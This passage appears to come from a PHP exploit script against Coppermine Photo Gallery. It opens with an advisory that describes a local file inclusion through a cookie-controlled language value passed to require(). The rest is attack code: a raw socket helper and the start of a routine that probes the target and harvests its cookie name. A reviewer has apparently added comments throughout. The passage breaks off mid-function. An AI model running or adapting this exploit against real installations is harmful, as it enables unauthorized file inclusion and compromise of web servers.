authenticate(); [...] 301. // Process language selection if present in URI or in user profile or try 302. // autodetection if default charset is utf-8 303. if (!empty($_GET['lang'])) 304. { 305. $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang']; 306. } 307. 308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php')) 309. { 310. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language 311. $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________'); 312. } 313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2] 314. { 315. include('include/select_lang.inc.php'); 316. if (file_exists('lang/' . $USER['lang'] . '.php')) 317. { 318. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language 319. $CONFIG['lang'] = $USER['lang']; 320. } 321. } 322. else 323. { 324. unset($USER['lang']); 325. } 326. 327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang'])) 328. { 329. unset($CONFIG['default_lang']); 330. } 331. 332. if (!file_exists("lang/{$CONFIG['lang']}.php")) 333. $CONFIG['lang'] = 'english'; 334. 335. // We load the chosen language file 336. require "lang/{$CONFIG['lang']}.php"; <======== [3] If $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could include an arbitrary local file through the require() at line 336 [3], because the $USER array can be manipulated via cookies (see the user_get_profile() function [1] defined in /include/functions.inc.php, near lines 128-146) [-] Path disclosure in /themes/sample/theme.php [-] Possible bug fix in /include/functions.inc.php 128. function user_get_profile() 129. { 130. global $CONFIG, $USER; 131. 132. if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) { 133. $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data'])); 134. $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang']; 135.
} */
// NOTE(review): the "} */" above closes the advisory comment block that opens before this excerpt.

// Silence every PHP notice/warning for the rest of the script. This also hides the
// "undefined variable" notice http_send() would otherwise raise on its first "$resp .=".
error_reporting(0);
// No execution time limit for the script.
set_time_limit(0);
// Default timeout (seconds) for socket operations that do not pass one explicitly;
// fsockopen() below is called without a timeout argument, so this is the value it falls back to.
ini_set("default_socket_timeout", 5);
// NOTE(review): the first argument is the bare identifier STDIN rather than the string 'STDIN',
// and the CLI SAPI already predefines STDIN; left exactly as written.
define(STDIN, fopen("php://stdin", "r"));

/**
 * Send one raw request to $host on TCP port 80 and return the whole response.
 *
 * Opens the connection with fsockopen() and retries in a loop until it succeeds — there is
 * no retry cap, so an unreachable host keeps the loop running — then writes $packet verbatim,
 * reads until EOF in 1024-byte chunks and returns everything read as one string.
 *
 * @param string $host   host name or IP to connect to (port is hard-coded to 80)
 * @param string $packet raw bytes to write, request line, headers and line endings included
 * @return string|null   the bytes read back; $resp is never initialised, so a peer that closes
 *                       without sending anything yields null rather than ''
 */
function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    while (!$sock) {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    // Accumulate the response until the peer closes the connection.
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    return $resp;
}

// get_info() continues beyond the end of this excerpt; only its opening statements are visible here.
function get_info() {
    global $host, $path, $cookie, $version, $path_disc;
    $packet = "GET {$path} HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $html = http_send($host, $packet);
    preg_match("/Set-Cookie: (.*)_data/", $html, $match);
    $cookie = $match[1];
    preg_match("/